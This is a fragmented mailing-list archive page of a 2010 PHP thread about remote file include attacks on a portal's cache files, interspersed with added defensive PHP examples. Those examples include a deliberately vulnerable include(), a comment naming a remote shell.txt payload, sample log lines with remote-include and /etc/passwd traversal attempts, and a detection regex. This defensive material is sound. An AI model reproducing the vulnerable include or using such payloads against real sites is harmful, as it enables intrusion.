one good reason to ever enable this, it would be a
security issue no matter how you slice it...
-Original Message-
From: Igor Escobar [mailto:titiolin...@gmail.com]
Sent: Tuesday, June 08, 2010 10:11 AM
To: richg...@gmail.com
Cc:
Subject: Re: [PHP] Security Issue
Hey Richard,
I'll find more about this parameter allow_url_include, thank you!
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 5:26 PM, richard gray wrote:
> On 07/06/201
Are you running the latest version of PHP?
If not you should check for PHP vulnerabilities for the version that you
have installed. You should also check your OS and web server software for
security holes.
On Mon, Jun 7, 2010 at 7:54 AM, Igor Escobar wrote:
> Hi Folks!
>
> The portal for which
On 07/06/2010 20:00, Igor Escobar wrote:
PHP Injection is the technical name given to a security hole in PHP
applications. When this hole exists, a hacker can cause external code to be
interpreted as internal code, as if the included code were just one more part
of the script.
// my code...
// my
From: Ashley Sheridan
> On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:
>
>> PHP Injection is the technical name given to a security hole in PHP
>> applications. When this hole exists, a hacker can cause external
>> code to be interpreted as internal code, as if the included code were
On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:
> PHP Injection is the technical name given to a security hole in PHP
> applications. When this hole exists, a hacker can cause external
> code to be interpreted as internal code, as if the included code were
> just one more part of the script.
I disagree; this kind of approach could be appropriate. If you walk
your input globals and apply some sanity checks and appropriate
filtering, you could fix the issue.
On Jun 7, 2010, at 10:52 AM, Igor Escobar wrote:
I think we're getting off topic here folks...
Regards,
Igor Escobar
S
I totally agree with you, Ash.
I came up here to ask you guys for some light. Anything to help me track
that M%$#% F#$CK#$# and discover where he's attacking from.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igores
PHP Injection is the technical name given to a security hole in PHP
applications. When this hole exists, a hacker can cause external code to be
interpreted as internal code, as if the included code were just one more part
of the script.
// my code...
// my code...
include ('http:///externalhacks
Because that only typecasts it. It's safe but it isn't what the user
actually entered.
This way I can actually determine if the user put in "123abc" and
reject it, not accept it and keep the "123" silently for example. Same
with floats. You may or may not consider a negative number acceptab
You could do generic things to modify the $_GET and other superglobal
arrays. For example, if you wanted to implement magic quotes yourself,
have a recursive function (I'd paste one but I'm on my phone), but
something akin to this:
$_GET = your_function_name($_GET);
An idea for you might be to
I think we're getting off topic here folks...
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:51 PM, Ashley Sheridan
wrote:
> On Mon, 2010-06-07 at 10:48 -0700, Michael
On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote:
> Oh yeah. I do more than just intval(). I make sure they didn't feed me
> anything BUT numeric text first. I do a sanity check before type
> forcing :)
>
> I use garbage in garbage out. So I take what is given to me and yes I
> escape i
On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:
> It's not a SQL Injection or XSS problem, Michael.
>
> It's a PHP Injection problem. I know how to fix that, but the web site is very,
> very huge, has lots and lots of partners, and I'm having a lot of difficulty
> identifying the source of the problem
Oh yeah. I do more than just intval(). I make sure they didn't feed me
anything BUT numeric text first. I do a sanity check before type
forcing :)
I use garbage in, garbage out. So I take what is given to me and yes, I
escape it before the db of course as well, and then encode on output.
On Ju
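The three points made in this message and in the same poster's two earlier ones (typecasting with intval() keeps the "123" of "123abc" instead of rejecting it; a recursive function applied to $_GET and the other superglobals; sanity-check before type forcing, escape before the database, encode on output) are shown together in the PHP below. It is an added example, not code posted in the thread: the function names (strict_int, strict_float, walk_input, sanity_filter, h) and the sample $get array are mine, and the only library calls are filter_var(), htmlspecialchars() and mb_check_encoding(), so the mbstring extension is assumed.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread. Function names, the sample $get
// array and the choice of filters are mine; the library calls are filter_var(),
// htmlspecialchars() and mb_check_encoding() (mbstring assumed present).

// Strict integer: the whole string must be an integer, optionally in range;
// otherwise null. FILTER_VALIDATE_INT rejects "123abc", "12.0" and "1e3",
// all of which intval() quietly turns into a number.
function strict_int(string $raw, int $min = PHP_INT_MIN, int $max = PHP_INT_MAX): ?int
{
    $opts = ['options' => ['min_range' => $min, 'max_range' => $max]];
    $v = filter_var($raw, FILTER_VALIDATE_INT, $opts);
    return $v === false ? null : $v;
}

// Same idea for floats: "3.5abc" and "" are rejected, "-2.5" is accepted,
// so whether a negative is acceptable is a separate check the caller makes.
function strict_float(string $raw): ?float
{
    $v = filter_var($raw, FILTER_VALIDATE_FLOAT);
    return $v === false ? null : $v;
}

// Recursively apply $filter to every string leaf of an input array, as in
// "$_GET = your_function_name($_GET)". Keys are kept; other scalars and null
// pass through unchanged; anything else (objects, resources) is dropped.
function walk_input(array $input, callable $filter): array
{
    $out = [];
    foreach ($input as $key => $value) {
        if (is_array($value)) {
            $out[$key] = walk_input($value, $filter);
        } elseif (is_string($value)) {
            $out[$key] = $filter($value);
        } elseif (is_scalar($value) || $value === null) {
            $out[$key] = $value;
        }
    }
    return $out;
}

// A generic floor for text fields: drop NUL bytes (they truncate paths in
// C-backed functions), refuse invalid UTF-8, trim. Per-field validation such
// as strict_int() still has to happen afterwards; this is not a replacement.
function sanity_filter(string $s): string
{
    $s = str_replace("\0", '', $s);
    if (!mb_check_encoding($s, 'UTF-8')) {
        return '';
    }
    return trim($s);
}

// Output side: encode at the moment the value goes into HTML. ENT_QUOTES
// also covers attribute values in single quotes; the charset must match the page.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed input: what $_GET holds for
// ?id=123abc&page=2&q=%3Cscript%3E&tags[]=a&tags[]=b%00c
$get = [
    'id'   => '123abc',
    'page' => '2',
    'q'    => '<script>',
    'tags' => ['a', "b\0c"],
];
$clean = walk_input($get, 'sanity_filter');

var_dump(intval($get['id']), strict_int($clean['id']));  // the difference at issue
var_dump(strict_int($clean['page'], 1, 500));
var_dump($clean['tags']);
echo h($clean['q']), "\n";
```

Run with `php` from the command line. intval('123abc') yields 123 while strict_int('123abc') yields null, which is the "reject it rather than keep the 123 silently" behaviour; the page number passes the 1..500 range check as 2; the NUL byte inside the second tag is stripped by the recursive walk; and the `<script>` value is only made safe at output time by h(), not by the input filter.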
On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote:
> It's not that bad.
>
> Use filter functions and sanity checks for input.
>
> Use htmlspecialchars() basically on output.
>
> That should take care of basically everything.
>
> On Jun 7, 2010, at 6:16 AM, Igor Escobar wrote:
>
> > Thi
It's not a SQL Injection or XSS problem, Michael.
It's a PHP Injection problem. I know how to fix that, but the web site is very,
very huge, has lots and lots of partners, and I'm having a lot of difficulty
identifying the source of the problem.
Got it?
Regards,
Igor Escobar
Systems Analyst & Interface Des
It's not that bad.
Use filter functions and sanity checks for input.
Use htmlspecialchars() basically on output.
That should take care of basically everything.
On Jun 7, 2010, at 6:16 AM, Igor Escobar wrote:
This was my fear.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ ht
-Original Message-
From: Igor Escobar [mailto:titiolin...@gmail.com]
Sent: Monday, June 07, 2010 9:21 AM
To: Phpster
Cc:
Subject: Re: [PHP] Security Issue
I do not believe he is doing so through forms, but through PHP Injection. We have
already found one of the files that he used to do the concatenation of the
cache files. We need to know if there is a tool, anything, that we can install
on the server to identify the hacker more easily, because the manual labor
This was my fear.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind wrote:
> On 7 June 2010 14:54, Igor Escobar wrote:
> > Hi Folks!
> >
> > The portal
Hi Ashley!
Thanks for helping us!
OK, first thing, check all the file access logs, i.e. FTP logs, etc, just to
make sure that it's not a case of a compromised password. There's a
well-known issue with people who use FileZilla on Windows systems that
allows passwords to be easily stolen.
We'v
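Igor asked above for something that could be installed on the server to find where the attacker is coming from, and Ashley's first suggestion was to go through the access and FTP logs. The script below is an added example, not something posted in the thread. It does the two checks a practitioner would start with: list cache files that contain an iframe (or a base64 eval) the application never writes itself, with their modification time, and pull out of the web server's access log every request whose query string carries a URL, a traversal sequence or a NUL byte, which is what a remote or local file include attempt looks like from the log's side. The cache directory, the marker strings and the four Apache combined-format log lines are constructed for the example; the function names are mine.

```php
<?php
declare(strict_types=1);

// Added example, not something posted in the thread. Two command-line checks
// for a server in Igor's situation. The cache directory and the four access-log
// lines below are constructed for the example.

// 1. Cache files: report every file that contains a marker the application
//    never writes itself, with its mtime, so it can be lined up against the
//    access log and the FTP log for the same minute.
function find_tampered_cache(string $cacheDir, array $markers = ['<iframe', 'eval(base64_decode']): array
{
    $hits = [];
    if (!is_dir($cacheDir)) {
        return $hits;
    }
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($cacheDir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $body = (string) file_get_contents($file->getPathname());
        foreach ($markers as $marker) {
            if (stripos($body, $marker) !== false) {
                $hits[] = [
                    'file'   => $file->getPathname(),
                    'marker' => $marker,
                    'mtime'  => date('c', $file->getMTime()),
                ];
                break;
            }
        }
    }
    return $hits;
}

// 2. Access log in Apache "combined" format. A request whose query string,
//    once URL-decoded, carries "scheme://" (http://, ftp://, php://, data://),
//    "../" or a NUL byte is what a remote or local file include attempt looks
//    like from the log's side.
const COMBINED_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
const INCLUDE_ATTEMPT_RE = '#(?:[a-z][a-z0-9+.-]*://|\.\./|\x00)#i';

function suspicious_requests(iterable $lines): array
{
    $out = [];
    foreach ($lines as $line) {
        if (!preg_match(COMBINED_RE, $line, $m)) {
            continue;                                 // not a combined-format line
        }
        [, $ip, $when, $method, $target, $status, $ua] = $m;
        $q = strpos($target, '?');
        $query = $q === false ? '' : rawurldecode(substr($target, $q + 1));
        if (preg_match(INCLUDE_ATTEMPT_RE, $query)) {
            $out[] = compact('ip', 'when', 'method', 'target', 'status', 'ua');
        }
    }
    return $out;
}

// Constructed sample: two include attempts from one address among ordinary traffic.
$sample = [
    '203.0.113.7 - - [07/Jun/2010:09:12:41 -0300] "GET /index.php?page=http://203.0.113.9/c.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [07/Jun/2010:09:13:02 -0300] "GET /news/2010/06/07/ HTTP/1.1" 200 18233 "http://www.example.com/" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Jun/2010:09:13:10 -0300] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 4801 "-" "libwww-perl/5.834"',
    '192.0.2.10 - - [07/Jun/2010:09:14:55 -0300] "POST /contact.php HTTP/1.1" 302 - "http://www.example.com/contact" "Mozilla/5.0"',
];

foreach (suspicious_requests($sample) as $r) {
    printf("%s %s %s %s -> %s (%s)\n", $r['when'], $r['ip'], $r['method'], $r['target'], $r['status'], $r['ua']);
}
foreach (find_tampered_cache($argv[1] ?? '/var/www/cache') as $hit) {
    printf("%s %s contains %s\n", $hit['mtime'], $hit['file'], $hit['marker']);
}
```

Run as `php hunt.php /path/to/cache`. On the sample, the two requests from 203.0.113.7 are reported (the remote include of c.txt and the /etc/passwd traversal with a NUL byte) and the two ordinary requests are not. To use it on a real server, replace $sample with `new SplFileObject('/var/log/apache2/access.log')`, which is iterable line by line, and compare the mtime of each tampered cache file with the timestamps of the flagged requests and with the FTP log: a cache file rewritten at a moment with no matching web request points at a stolen FTP password rather than at an include hole.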
On Jun 7, 2010, at 8:54 AM, Igor Escobar wrote:
Hi Folks!
The portal for which I work is suffering constant attacks that I feel are
PHP Injection. Somehow the hacker is getting to change the cache files
that our system generates, concatenating the HTML file with another that
has a
On 7 June 2010 14:54, Igor Escobar wrote:
> Hi Folks!
>
> The portal for which I work is suffering constant attacks that I feel are
> PHP Injection. Somehow the hacker is getting to change the cache files
> that our system generates, concatenating the HTML file with another that
> has an ifra
On Mon, 2010-06-07 at 09:54 -0300, Igor Escobar wrote:
> Hi Folks!
>
> The portal for which I work is suffering constant attacks that I feel are
> PHP Injection. Somehow the hacker is getting to change the cache files
> that our system generates, concatenating the HTML file with another that
It was able to call up external includes using the code below, which resulted
in the server being used to send out spam.
How can I protect the code?
Is ../inc/ in the web path? $_SERVER['DOCUMENT_ROOT']
If so, then what do you mean by "external includes"? You need to move inc/
to a path unre
Karl,
Some simple checks on $contpath could solve your problem. Make sure that:
- it doesn't start with a /
- it doesn't contain /../
- it doesn't contain a double slash //, or make sure the URL Fopen wrapper
is disabled:
http://nl3.php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen
Usuall
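Igor's message earlier on this page illustrated the hole with an include() whose argument an attacker controls, and the reply to Karl just above lists the checks to apply to $contpath. The PHP below is an added example, not code from either thread: the vulnerable include beside a hardened one that applies those three checks plus a scheme and NUL-byte check, an allowlist of template names, a realpath() containment test, and a refusal to serve anything while allow_url_include is still on. The directory /var/www/app/inc, the allowlist contents and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread. Assumed layout: templates live in
// /var/www/app/inc/ and are chosen by a request parameter (Igor's include()
// took a URL; Karl's took $contpath).

// VULNERABLE: the request parameter goes straight into include(). With
// allow_url_include=On it loads http://attacker.example/shell.txt; with it
// off, ../../../etc/passwd or a writable log file is still reachable.
function render_page_vulnerable(string $contpath): void
{
    include '../inc/' . $contpath;
}

const INC_DIR = '/var/www/app/inc';               // assumed
const ALLOWED_PAGES = ['home', 'news', 'contact']; // assumed allowlist

// Hardened: returns the absolute template path, or null to refuse.
//  1. structural checks, the ones suggested to Karl, plus "scheme://" and NUL;
//  2. an allowlist of template names, which is the real fix;
//  3. realpath() containment, so a symlink cannot escape INC_DIR.
function safe_template_path(string $page): ?string
{
    if ($page === '' || $page[0] === '/' || $page[0] === '\\') {
        return null;                                  // absolute path
    }
    if (strpos($page, "\0") !== false) {
        return null;                                  // NUL byte truncation
    }
    if (preg_match('#(^|/)\.\.(/|$)#', $page) || strpos($page, '//') !== false) {
        return null;                                  // "../" or "//"
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $page)) {
        return null;                                  // http://, ftp://, php://, data://
    }
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;                                  // not a known template
    }
    $real = realpath(INC_DIR . '/' . $page . '.php');
    $base = realpath(INC_DIR);
    if ($real === false || $base === false || strpos($real, $base . '/') !== 0) {
        return null;                                  // resolved outside INC_DIR
    }
    return $real;
}

function render_page(string $page): void
{
    // allow_url_include is PHP_INI_SYSTEM; a script cannot turn it off, so
    // refuse to serve anything while the server still has it on.
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('allow_url_include is On; fix php.ini first');
    }
    $path = safe_template_path($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

render_page((string) ($_GET['page'] ?? 'home'));
```

With this in place, 'news' is served only if /var/www/app/inc/news.php exists; '../../../etc/passwd' is refused at the traversal check, 'http://attacker.example/shell.txt' at the scheme check, and 'news/../news' at the traversal check before the allowlist is even consulted. The allowlist alone would block all of them; the structural checks are there so that a later change to the allowlist cannot quietly reopen the hole. The server-side setting that removes the remote half of the problem is `allow_url_include = Off` in php.ini (it is off by default since PHP 5.2), together with `allow_url_fopen = Off` where nothing legitimately needs it and an `open_basedir` that confines include() to the application directory.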
Not really sure what you need suggestions on. There are tons
of examples for querying MySQL databases from PHP out
there around the net, not to mention the php.net mysql
area itself.
Scott Novinger wrote:
> Hello,
>
> Would someone please offer some specific suggestions for the following?:
>
> 1. I have several static web pages ready to be published on the
> internet.
Great
> 2. We have chosen PHP, MySQL and Apache as part of our development
> system.
Ok
> 3. I would like to incorporate a PHP script into each static web page
> that queries a MySQL database. This script will de
30 matches